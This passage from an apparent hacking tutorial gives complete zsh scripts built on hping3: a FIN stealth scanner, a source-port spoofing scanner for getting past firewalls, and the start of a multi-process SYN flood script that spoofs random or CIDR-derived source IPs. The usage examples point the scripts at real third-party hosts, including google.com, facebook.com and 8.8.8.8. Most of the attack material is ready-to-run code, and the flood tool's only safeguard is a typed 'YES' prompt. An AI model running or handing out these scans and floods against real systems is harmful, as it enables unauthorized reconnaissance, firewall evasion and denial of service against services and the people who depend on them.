    fi
    if grep -q "139:\|445:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ SMB/NetBIOS ports are exposed - ensure proper access controls${NC}"
    fi
    if grep -q "3389:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ RDP (port 3389) is exposed - use VPN or restrict access${NC}"
    fi
    if grep -q "3306:\|5432:\|1433:" "$OPEN_PORTS_FILE" 2>/dev/null; then
        echo -e "${YELLOW}⚠ Database ports are exposed - should not be publicly accessible${NC}"
    fi
fi

echo ""
exit 0
EOF

chmod +x ./common_ports_scan.sh

How to Run:

# Scan default common ports
./common_ports_scan.sh example.com

# Scan web server ports
./common_ports_scan.sh example.com web

# Scan database ports
./common_ports_scan.sh example.com database

# Scan top 100 ports
./common_ports_scan.sh example.com top100

# Scan top 1000 ports with 100 threads
./common_ports_scan.sh example.com top1000 100

# Custom port list
./common_ports_scan.sh example.com "22,80,443,3306,8080"

# Get help
./common_ports_scan.sh --help

Default Ports Included:
– **21**: FTP (File Transfer Protocol)
– **22**: SSH (Secure Shell)
– **23**: Telnet
– **25**: SMTP (Simple Mail Transfer Protocol)
– **53**: DNS (Domain Name System)
– **80**: HTTP (Hypertext Transfer Protocol)
– **110**: POP3 (Post Office Protocol v3)
– **143**: IMAP (Internet Message Access Protocol)
– **443**: HTTPS (HTTP Secure)
– **445**: SMB (Server Message Block)
– **3306**: MySQL Database
– **3389**: RDP (Remote Desktop Protocol)
– **5432**: PostgreSQL Database
– **8080**: HTTP-Alt (alternate HTTP)
– **8443**: HTTPS-Alt (alternate HTTPS)

Script 6: Stealth FIN Scanner

Purpose:
Performs FIN scanning, a stealth technique that sends TCP packets with only the FIN flag set. This can bypass some firewalls and intrusion detection systems that only monitor SYN packets.
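
The technique relies on standard TCP behaviour (RFC 793): a closed port must answer an unsolicited FIN with RST, while an open port is expected to drop it silently. Stacks that deviate from this, notably Windows, send RST from open ports as well, which is why FIN scan verdicts are probabilistic rather than definitive.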

Create the Script:

cat > ./fin_scan.sh << 'EOF'
#!/bin/zsh

# TCP FIN Scanner using hping3
# Performs stealthy FIN scans to detect firewall rules and port states
# FIN scanning is a stealth technique that may bypass some firewalls
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
PORT_SPEC="${2:-80}"
COUNT="${3:-2}"
DELAY="${4:-1}"

# Function to print usage
print_usage() {
    local script_name="./fin_scan.sh"
    echo "Usage: $script_name <target> [port|port_range] [count] [delay]"
    echo ""
    echo "Parameters:"
    echo "  target      - Hostname or IP address to scan"
    echo "  port        - Single port or range (e.g., 80 or 80-90)"
    echo "  count       - Number of FIN packets per port (default: 2)"
    echo "  delay       - Delay between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                # Scan port 80"
    echo "  $script_name example.com 443            # Scan port 443"
    echo "  $script_name example.com 80-85          # Scan ports 80-85"
    echo "  $script_name 192.168.1.1 22 3 0.5       # 3 packets, 0.5s delay"
    echo ""
    echo "FIN Scan Technique:"
    echo "  - Sends TCP packets with only FIN flag set"
    echo "  - CLOSED ports respond with RST"
    echo "  - OPEN ports typically don't respond (stealth)"
    echo "  - FILTERED ports may send ICMP or no response"
    echo ""
    echo "Response Interpretation:"
    echo "  RST received    = Port is CLOSED"
    echo "  No response     = Port is likely OPEN or FILTERED"
    echo "  ICMP received   = Port is FILTERED by firewall"
}

# Function to validate port
validate_port() {
    local port=$1
    if ! [[ "$port" =~ ^[0-9]+$ ]]; then
        return 1
    fi
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        return 1
    fi
    return 0
}

# Function to get service name
get_service_name() {
    local port=$1
    # Trim any whitespace from port number
    port=$(echo "$port" | tr -d ' ')
    # Common services
    case $port in
        21) echo "FTP" ;;
        22) echo "SSH" ;;
        23) echo "Telnet" ;;
        25) echo "SMTP" ;;
        53) echo "DNS" ;;
        80) echo "HTTP" ;;
        110) echo "POP3" ;;
        143) echo "IMAP" ;;
        443) echo "HTTPS" ;;
        445) echo "SMB" ;;
        3306) echo "MySQL" ;;
        3389) echo "RDP" ;;
        5432) echo "PostgreSQL" ;;
        6379) echo "Redis" ;;
        8080) echo "HTTP-Alt" ;;
        8443) echo "HTTPS-Alt" ;;
        27017) echo "MongoDB" ;;
        *)
            # Try system services
            local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
            if [[ -n "$service" ]]; then
                echo "$service"
            else
                echo "Unknown"
            fi
            ;;
    esac
}

# Function to perform FIN scan on a single port
scan_port() {
    local target=$1
    local port=$2
    local count=$3
    local delay=$4
    
    local service=$(get_service_name "$port")
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}Scanning Port:${NC} $port/tcp ($service)"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    local responses=0
    local rst_count=0
    local icmp_count=0
    local no_response=0
    
    for i in $(seq 1 $count); do
        echo -e "${YELLOW}[→] Sending FIN packet $i/$count to port $port...${NC}"
        
        # Run hping3 with FIN flag
        local result=$(hping3 -F -p "$port" -c 1 "$target" 2>&1)
        
        # Analyze response
        if echo "$result" | grep -q "flags=RA\|flags=R"; then
            echo -e "${RED}[←] RST received - Port $port is CLOSED${NC}"
            ((rst_count++))
            ((responses++))
        elif echo "$result" | grep -q "ICMP"; then
            echo -e "${YELLOW}[←] ICMP received - Port $port is FILTERED${NC}"
            ((icmp_count++))
            ((responses++))
        elif echo "$result" | grep -q "timeout\|100% packet loss"; then
            echo -e "${GREEN}[◊] No response - Port $port may be OPEN or heavily FILTERED${NC}"
            ((no_response++))
        else
            # Check for any other response
            if echo "$result" | grep -q "len="; then
                echo -e "${BLUE}[←] Unexpected response received${NC}"
                ((responses++))
            else
                echo -e "${GREEN}[◊] No response - Port $port may be OPEN${NC}"
                ((no_response++))
            fi
        fi
        
        # Add delay between packets
        if [ "$i" -lt "$count" ] && [ "$delay" != "0" ]; then
            sleep "$delay"
        fi
    done
    
    # Port state analysis
    echo ""
    echo -e "${CYAN}Port $port Analysis:${NC}"
    echo -e "  Packets sent: $count"
    echo -e "  RST responses: $rst_count"
    echo -e "  ICMP responses: $icmp_count"
    echo -e "  No responses: $no_response"
    
    # Determine likely port state and encode the verdict in the return code
    # (0 = open/filtered, 1 = closed, 2 = filtered, 3 = uncertain)
    if [ "$rst_count" -gt 0 ]; then
        echo -e "  ${RED}▸ Verdict: Port $port is CLOSED${NC}"
        return 1
    elif [ "$icmp_count" -gt 0 ]; then
        echo -e "  ${YELLOW}▸ Verdict: Port $port is FILTERED (firewall blocking)${NC}"
        return 2
    elif [ "$no_response" -eq "$count" ]; then
        echo -e "  ${GREEN}▸ Verdict: Port $port is likely OPEN or silently FILTERED${NC}"
        echo -e "  ${CYAN}  Note: No response to FIN often indicates OPEN port${NC}"
        return 0
    else
        echo -e "  ${BLUE}▸ Verdict: Port $port state is UNCERTAIN${NC}"
        return 3
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Parse port specification (single port or range)
START_PORT=""
END_PORT=""

if [[ "$PORT_SPEC" =~ ^([0-9]+)-([0-9]+)$ ]]; then
    # Port range (zsh compatible)
    START_PORT="${match[1]}"
    END_PORT="${match[2]}"
    
    # Validate range
    if ! validate_port "$START_PORT" || ! validate_port "$END_PORT"; then
        echo -e "${RED}Error: Invalid port range${NC}"
        exit 1
    fi
    
    if [ "$START_PORT" -gt "$END_PORT" ]; then
        echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
        exit 1
    fi
elif [[ "$PORT_SPEC" =~ ^[0-9]+$ ]]; then
    # Single port
    if ! validate_port "$PORT_SPEC"; then
        echo -e "${RED}Error: Port must be between 1-65535${NC}"
        exit 1
    fi
    START_PORT="$PORT_SPEC"
    END_PORT="$PORT_SPEC"
else
    echo -e "${RED}Error: Invalid port specification${NC}"
    echo "Use a single port (e.g., 80) or range (e.g., 80-90)"
    exit 1
fi

# Validate count
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [ "$COUNT" -lt 1 ]; then
    echo -e "${RED}Error: Count must be a positive number${NC}"
    exit 1
fi

# Validate delay
if ! [[ "$DELAY" =~ ^[0-9]*\.?[0-9]+$ ]]; then
    echo -e "${RED}Error: Delay must be a number${NC}"
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: FIN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))

# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║         TCP FIN SCANNER                ║${NC}"
echo -e "${MAGENTA}║      (Stealth Scan Technique)          ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}         $TARGET"
if [ "$START_PORT" -eq "$END_PORT" ]; then
    echo -e "  ${BLUE}Port:${NC}           $START_PORT"
else
    echo -e "  ${BLUE}Port Range:${NC}     $START_PORT-$END_PORT ($TOTAL_PORTS ports)"
fi
echo -e "  ${BLUE}Packets/Port:${NC}   $COUNT"
echo -e "  ${BLUE}Packet Delay:${NC}   ${DELAY}s"
echo -e "  ${BLUE}Scan Type:${NC}      TCP FIN (Stealth)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Resolve target
echo ""
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting FIN scan...${NC}"
echo -e "${CYAN}[i] FIN scan sends TCP packets with only the FIN flag set${NC}"
echo -e "${CYAN}[i] This technique may bypass some packet filters and IDS${NC}"

# Results tracking
declare -A PORT_STATES
OPEN_PORTS=""
CLOSED_PORTS=""
FILTERED_PORTS=""

# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
    scan_port "$TARGET_IP" "$port" "$COUNT" "$DELAY"
    
    # Store result based on the verdict code returned by scan_port
    case $? in
        0) OPEN_PORTS="${OPEN_PORTS}$port "; PORT_STATES[$port]="OPEN/FILTERED" ;;
        1) CLOSED_PORTS="${CLOSED_PORTS}$port "; PORT_STATES[$port]="CLOSED" ;;
        2) FILTERED_PORTS="${FILTERED_PORTS}$port "; PORT_STATES[$port]="FILTERED" ;;
        *) PORT_STATES[$port]="UNCERTAIN" ;;
    esac
done

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Generate summary report
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}         SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count results
OPEN_COUNT=$(echo "$OPEN_PORTS" | wc -w | tr -d ' ')
CLOSED_COUNT=$(echo "$CLOSED_PORTS" | wc -w | tr -d ' ')
FILTERED_COUNT=$(echo "$FILTERED_PORTS" | wc -w | tr -d ' ')

echo -e "${BLUE}Scan Results:${NC}"
echo -e "  Total Ports Scanned: $TOTAL_PORTS"
echo -e "  Likely Open/Filtered: $OPEN_COUNT"
echo -e "  Confirmed Closed: $CLOSED_COUNT"
echo -e "  Confirmed Filtered: $FILTERED_COUNT"
echo -e "  Scan Duration: ${DURATION} seconds"

if [ "$OPEN_COUNT" -gt 0 ]; then
    echo ""
    echo -e "${GREEN}Potentially Open Ports:${NC}"
    for port in $OPEN_PORTS; do
        service=$(get_service_name "$port")
        echo -e "  ${GREEN}▸${NC} Port $port/tcp - $service"
    done
fi

# Save report to file
REPORT_FILE="fin_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
{
    echo "TCP FIN Scan Report"
    echo "==================="
    echo "Target: $TARGET ($TARGET_IP)"
    echo "Port Range: $START_PORT-$END_PORT"
    echo "Scan Date: $(date)"
    echo "Duration: ${DURATION} seconds"
    echo "Technique: TCP FIN (Stealth Scan)"
    echo ""
    echo "Results:"
    echo "--------"
    echo "Likely Open/Filtered: $OPEN_COUNT"
    echo "Confirmed Closed: $CLOSED_COUNT"
    echo "Confirmed Filtered: $FILTERED_COUNT"
    
    if [ "$OPEN_COUNT" -gt 0 ]; then
        echo ""
        echo "Potentially Open Ports:"
        for port in $OPEN_PORTS; do
            service=$(get_service_name "$port")
            echo "  Port $port/tcp - $service"
        done
    fi
} > "$REPORT_FILE"

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
echo ""
echo -e "${YELLOW}Important Notes:${NC}"
echo -e "${CYAN}• FIN scanning is a stealth technique${NC}"
echo -e "${CYAN}• No response often indicates an OPEN port${NC}"
echo -e "${CYAN}• RST response indicates a CLOSED port${NC}"
echo -e "${CYAN}• Results may vary based on firewall rules${NC}"
echo -e "${CYAN}• Some systems may not follow RFC standards${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./fin_scan.sh

How to Run:

# Scan default port 80
./fin_scan.sh example.com

# Scan specific port
./fin_scan.sh example.com 443

# Scan port range
./fin_scan.sh example.com 80-85

# Custom parameters
./fin_scan.sh 192.168.1.1 22 3 0.5

# Quick single packet scan
./fin_scan.sh server.com 80-443 1 0

# Get help
./fin_scan.sh --help

Response Interpretation:
– **No response**: Port likely open (or filtered)
– **RST response**: Port closed
– **ICMP unreachable**: Port filtered
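
The underlying probe is a single FIN packet; a minimal equivalent one-liner (hostname and port are placeholders):

# Send one FIN to TCP/80; an RST reply means closed, silence suggests open or filtered
sudo hping3 -F -p 80 -c 1 example.com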

Script 7: Source Port Spoofing

Purpose:
Modifies the source port of outgoing packets to bypass firewall rules that allow traffic from specific “trusted” ports like DNS (53) or FTP-DATA (20).

Create the Script:

cat > ./source_port_scan.sh << 'EOF'
#!/bin/zsh

# Source Port Spoofing Scanner using hping3
# Attempts to bypass firewalls that trust certain source ports
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments early
TARGET="$1"
DEST_PORT="${2:-80}"
SOURCE_PORT="${3:-53}"
COUNT="${4:-1}"

# Function to print usage
print_usage() {
    local script_name="./source_port_scan.sh"
    echo "Usage: $script_name <target> [dest_port] [source_port] [count]"
    echo ""
    echo "Parameters:"
    echo "  target       - Hostname or IP address to scan"
    echo "  dest_port    - Destination port to scan (default: 80)"
    echo "  source_port  - Source port to spoof (default: 53)"
    echo "  count        - Number of packets to send (default: 1)"
    echo ""
    echo "Common trusted source ports:"
    echo "  53 (DNS), 20 (FTP-DATA), 123 (NTP), 67/68 (DHCP)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                  # Scan port 80 from source port 53"
    echo "  $script_name example.com 443               # Scan port 443 from source port 53"
    echo "  $script_name example.com 80 20             # Scan port 80 from source port 20"
    echo "  $script_name example.com 80 53 3           # Send 3 packets"
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: Source port scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Map common source ports to names
declare -A source_services
source_services[53]="DNS"
source_services[20]="FTP-DATA"
source_services[123]="NTP"
source_services[67]="DHCP"
source_services[68]="DHCP"
source_services[88]="Kerberos"
source_services[500]="IKE/IPSec"

SERVICE_NAME=${source_services[$SOURCE_PORT]:-"Custom"}

# Display header
echo -e "${MAGENTA}╔════════════════════════════════════════╗${NC}"
echo -e "${MAGENTA}║    SOURCE PORT SPOOFING SCANNER       ║${NC}"
echo -e "${MAGENTA}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}         $TARGET:$DEST_PORT"
echo -e "  ${BLUE}Source Port:${NC}    $SOURCE_PORT ($SERVICE_NAME)"
echo -e "  ${BLUE}Packet Count:${NC}   $COUNT"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${YELLOW}[*] Attempting to bypass firewall rules that trust source port $SOURCE_PORT${NC}"
echo -e "${CYAN}[i] Some firewalls allow traffic from 'trusted' source ports${NC}"
echo ""

# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

echo ""
echo -e "${GREEN}[+] Starting source port spoofing scan...${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0

for i in $(seq 1 $COUNT); do
    echo -e "${CYAN}[→] Sending SYN packet $i/$COUNT from port $SOURCE_PORT...${NC}"
    result=$(hping3 -S -p $DEST_PORT -s $SOURCE_PORT -c 1 $TARGET_IP 2>&1)
    
    if echo "$result" | grep -q "flags=SA\|flags=S\.A"; then
        echo -e "${GREEN}[✓] Port $DEST_PORT appears OPEN (SYN+ACK received)${NC}"
        echo -e "${GREEN}    → Source port spoofing may have bypassed filtering!${NC}"
        ((OPEN_COUNT++))
    elif echo "$result" | grep -q "flags=RA\|flags=R"; then
        echo -e "${RED}[✗] Port $DEST_PORT appears CLOSED (RST received)${NC}"
        ((CLOSED_COUNT++))
    elif echo "$result" | grep -q "ICMP"; then
        icmp_type=$(echo "$result" | grep -oE "ICMP [^,]+" | head -1)
        echo -e "${YELLOW}[!] ICMP response received: $icmp_type${NC}"
        echo -e "${YELLOW}    → Port is likely FILTERED by firewall${NC}"
        ((FILTERED_COUNT++))
    elif echo "$result" | grep -q "100% packet loss\|timeout"; then
        echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
        ((FILTERED_COUNT++))
    else
        # Check for any response
        if echo "$result" | grep -q "len="; then
            echo -e "${BLUE}[←] Unexpected response received${NC}"
            echo "$result" | grep "len=" | head -1
        else
            echo -e "${YELLOW}[?] No response - Port $DEST_PORT may be FILTERED${NC}"
            ((FILTERED_COUNT++))
        fi
    fi
    
    if [ "$i" -lt "$COUNT" ]; then
        sleep 0.5
    fi
done

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}         SCAN SUMMARY${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
echo -e "${BLUE}Target:${NC} $TARGET ($TARGET_IP)"
echo -e "${BLUE}Port Scanned:${NC} $DEST_PORT"
echo -e "${BLUE}Source Port Used:${NC} $SOURCE_PORT ($SERVICE_NAME)"
echo ""

if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}▸ Verdict: Port $DEST_PORT is OPEN${NC}"
    echo -e "${GREEN}  ✓ Source port $SOURCE_PORT successfully bypassed filtering!${NC}"
    echo -e "${YELLOW}  ⚠ Warning: Firewall may be misconfigured to trust port $SOURCE_PORT${NC}"
elif [ "$CLOSED_COUNT" -gt 0 ]; then
    echo -e "${RED}▸ Verdict: Port $DEST_PORT is CLOSED${NC}"
    echo -e "${CYAN}  Note: Port responded normally regardless of source port${NC}"
else
    echo -e "${YELLOW}▸ Verdict: Port $DEST_PORT is FILTERED${NC}"
    echo -e "${CYAN}  Note: Source port $SOURCE_PORT did not bypass filtering${NC}"
    echo -e "${CYAN}  The firewall is properly configured against source port spoofing${NC}"
fi

echo ""
echo -e "${BLUE}Results Summary:${NC}"
echo -e "  Open responses: $OPEN_COUNT"
echo -e "  Closed responses: $CLOSED_COUNT"
echo -e "  Filtered/No response: $FILTERED_COUNT"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

echo ""
echo -e "${YELLOW}Security Notes:${NC}"
echo -e "${CYAN}• Source port spoofing tests firewall trust relationships${NC}"
echo -e "${CYAN}• Some older firewalls trust traffic from DNS (53) or FTP-DATA (20)${NC}"
echo -e "${CYAN}• Modern firewalls should not trust source ports alone${NC}"
echo -e "${CYAN}• This technique is often combined with other evasion methods${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./source_port_scan.sh

How to Run:

# Basic Examples
./source_port_scan.sh google.com                      # Default: port 80, source port 53 (DNS), 1 packet
./source_port_scan.sh github.com 443                  # Scan HTTPS port with DNS source port
./source_port_scan.sh example.com 80 20               # Use FTP-DATA source port (20)
./source_port_scan.sh cloudflare.com 443 53 5         # Send 5 packets for reliability

# Advanced Examples
./source_port_scan.sh 192.168.1.1 22 123 3           # SSH scan with NTP source port
./source_port_scan.sh internalserver.local 3306 68 2  # MySQL scan with DHCP client port
./source_port_scan.sh api.example.com 8080 1337 3     # Custom source port 1337

# Testing Web Servers
./source_port_scan.sh mywebsite.com 80 53 3          # HTTP with DNS source
./source_port_scan.sh mywebsite.com 443 53 3         # HTTPS with DNS source

# Testing Multiple Trusted Ports on Same Target
./source_port_scan.sh target.com 80 53 2             # DNS source port
./source_port_scan.sh target.com 80 20 2             # FTP-DATA source port
./source_port_scan.sh target.com 80 123 2            # NTP source port
./source_port_scan.sh target.com 80 67 2             # DHCP source port

# Internal Network Testing
./source_port_scan.sh 10.0.1.100 445 53 3            # SMB with DNS source
./source_port_scan.sh 10.0.1.100 3389 53 3           # RDP with DNS source

# Testing Popular Services
./source_port_scan.sh google.com 80 53 2             # Google HTTP
./source_port_scan.sh facebook.com 443 53 2          # Facebook HTTPS
./source_port_scan.sh amazon.com 443 20 2            # Amazon with FTP-DATA source

# Testing DNS Servers
./source_port_scan.sh 8.8.8.8 53 123 2               # Google DNS with NTP source
./source_port_scan.sh 1.1.1.1 53 20 2                # Cloudflare DNS with FTP-DATA source

# Help Command
./source_port_scan.sh --help                         # Show usage information
./source_port_scan.sh -h                             # Alternative help flag

Common Trusted Source Ports:
– **53**: DNS – Often allowed through firewalls
– **20**: FTP-DATA – May be trusted for FTP connections
– **123**: NTP – Network Time Protocol, often allowed
– **67/68**: DHCP – Dynamic Host Configuration Protocol
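
To reproduce one of these checks by hand, without the script, the underlying hping3 calls look roughly like this (the target and destination port are placeholders; -k keeps the chosen source port fixed instead of letting hping3 increment it):

# Probe port 443 while claiming to come from DNS (53); a "flags=SA" reply suggests the firewall trusts the source port
sudo hping3 -S -p 443 -s 53 -k -c 1 target.example.com

# The same probe from FTP-DATA (20) for comparison
sudo hping3 -S -p 443 -s 20 -k -c 1 target.example.com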

Script 8: SYN Flood Attack (Multi-Process with Source IP Decoy)

Purpose:
Performs multi-process SYN flood attacks for authorized DoS testing. This script can cause significant load – especially when used with decoy options.

Create the Script:

cat > ./syn_flood_attack.sh << 'EOF'
#!/bin/zsh

# Function to generate a random IP from a CIDR block
generate_random_ip_from_cidr() {
    local cidr=$1
    local ip_base=${cidr%/*}
    local cidr_bits=${cidr#*/}
    
    # Convert IP to integer
    local ip_parts=(${(s:.:)ip_base})
    local ip_int=$(( (ip_parts[1] << 24) + (ip_parts[2] << 16) + (ip_parts[3] << 8) + ip_parts[4] ))
    
    # Calculate host bits and range
    local host_bits=$((32 - cidr_bits))
    local max_hosts=$((2 ** host_bits - 1))
    
    # Generate random offset within the range
    local random_offset=$((RANDOM % (max_hosts + 1)))
    
    # Add offset to base IP
    local new_ip_int=$((ip_int + random_offset))
    
    # Convert back to IP format
    local octet1=$(( (new_ip_int >> 24) & 255 ))
    local octet2=$(( (new_ip_int >> 16) & 255 ))
    local octet3=$(( (new_ip_int >> 8) & 255 ))
    local octet4=$(( new_ip_int & 255 ))
    
    echo "${octet1}.${octet2}.${octet3}.${octet4}"
}

syn_flood_attack() {
    local target=$1
    local port=$2
    local packet_count=$3
    local processes=$4
    local source_cidr=$5  # Optional CIDR block for source IP randomization
    
    if [ -z "$target" ] || [ -z "$port" ] || [ -z "$packet_count" ] || [ -z "$processes" ]; then
        echo "Usage: syn_flood_attack <target> <port> <packet_count> <processes> [source_cidr]"
        echo "Example: syn_flood_attack example.com 80 1000 4"
        echo "Example with CIDR: syn_flood_attack example.com 80 1000 4 192.168.1.0/24"
        echo ""
        echo "WARNING: This is a DoS attack tool!"
        echo "Only use on systems you own or have explicit permission to test!"
        return 1
    fi
    
    echo "=========================================="
    echo "           SYN FLOOD ATTACK"
    echo "=========================================="
    echo "Target: $target:$port"
    echo "Total packets: $packet_count"
    echo "Processes: $processes"
    echo "Packets per process: $((packet_count / processes))"
    if [ -n "$source_cidr" ]; then
        echo "Source CIDR: $source_cidr"
    else
        echo "Source IPs: Random (--rand-source)"
    fi
    echo ""
    echo "⚠️  WARNING: This will perform a SYN flood attack!"
    echo "⚠️  Only use on systems you own or have explicit permission to test!"
    echo "⚠️  Unauthorized DoS attacks are illegal!"
    echo ""
    echo -n "Do you have authorization to test this target? (type 'YES' to continue): "
    read confirm
    
    if [[ "$confirm" != "YES" ]]; then
        echo "❌ Attack aborted - explicit authorization required"
        return 1
    fi
    
    local packets_per_process=$((packet_count / processes))
    local remaining_packets=$((packet_count % processes))
    
    echo "✅ Starting SYN flood with $processes processes..."
    echo "📊 Monitor system resources during attack"
    
    # Create log directory
    local log_dir="/tmp/syn_flood_$(date +%Y%m%d_%H%M%S)"
    mkdir -p "$log_dir"
    
    # Start background processes
    local pids=()
    for ((i=1; i<=processes; i++)); do
        local current_packets=$packets_per_process
        # Add remaining packets to the last process
        if [ $i -eq $processes ]; then
            current_packets=$((packets_per_process + remaining_packets))
        fi
        
        echo "🚀 Starting process $i with $current_packets packets"
        (
            echo "Process $i started at $(date)" > "$log_dir/process_$i.log"
            
            if [ -n "$source_cidr" ]; then
                # Use CIDR block for source IP randomization
                echo "Using source CIDR: $source_cidr" >> "$log_dir/process_$i.log"
                
                # Send packets with randomized source IPs from CIDR block
                # We'll send packets in smaller batches to vary the source IP
                local batch_size=10
                local sent=0
                
                while [ $sent -lt $current_packets ]; do
                    local remaining=$((current_packets - sent))
                    local this_batch=$((remaining < batch_size ? remaining : batch_size))
                    local source_ip=$(generate_random_ip_from_cidr "$source_cidr")
                    
                    # Note: some hping3 builds ignore -c when --flood is set and keep sending until killed;
                    # verify on your system, or drop --flood if you need the packet count honoured
                    hping3 -S -p $port -a $source_ip -c $this_batch --flood $target >> "$log_dir/process_$i.log" 2>&1
                    sent=$((sent + this_batch))
                done
            else
                # Use completely random source IPs
                echo "Using random source IPs" >> "$log_dir/process_$i.log"
                hping3 -S -p $port --rand-source -c $current_packets --flood $target >> "$log_dir/process_$i.log" 2>&1
            fi
            
            echo "Process $i completed at $(date)" >> "$log_dir/process_$i.log"
            echo "✅ Process $i completed ($current_packets packets sent)"
        ) &
        
        pids+=($!)
    done
    
    echo "⏳ Waiting for all processes to complete..."
    echo "💡 You can monitor progress with: tail -f $log_dir/process_*.log"
    
    # Wait for all processes and show progress
    local completed=0
